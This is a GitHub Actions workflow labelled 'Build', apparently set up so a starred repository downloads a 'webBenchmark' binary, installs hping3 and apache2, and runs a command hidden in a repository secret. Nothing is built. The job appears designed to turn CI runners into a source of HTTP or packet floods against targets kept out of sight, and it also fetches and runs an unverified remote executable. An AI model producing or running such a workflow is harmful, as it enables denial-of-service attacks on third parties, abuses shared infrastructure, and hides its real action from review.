name: 'Build' 
on:
#  push: 
  watch:
    types: started
jobs:
  Run:
    runs-on: ubuntu-latest
    steps:
      - name: 'Ready'
        run: |
          wget https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64 -O bm
          chmod +x bm
          sudo apt install hping3
          sudo apt install apache2
      - name: 'Build'
        run: |
          ${{ secrets.Command }}
